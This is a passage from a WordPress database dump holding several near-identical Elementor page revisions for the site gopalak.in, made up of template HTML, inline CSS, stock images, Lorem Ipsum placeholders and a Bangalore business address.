<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:45:19','2022-09-30 06:15:19','',1373,'https://gopalak.in/?p=1484',0,'revision','',0),(1485,1,'2022-09-30 11:45:19','2022-09-30 06:15:19','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:45:19','2022-09-30 06:15:19','',1373,'https://gopalak.in/?p=1485',0,'revision','',0),(1486,1,'2022-09-30 11:46:12','2022-09-30 06:16:12','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:46:12','2022-09-30 06:16:12','',1373,'https://gopalak.in/?p=1486',0,'revision','',0),(1487,1,'2022-09-30 11:46:13','2022-09-30 06:16:13','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:46:13','2022-09-30 06:16:13','',1373,'https://gopalak.in/?p=1487',0,'revision','',0),(1488,1,'2022-09-30 11:46:13','2022-09-30 06:16:13','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" 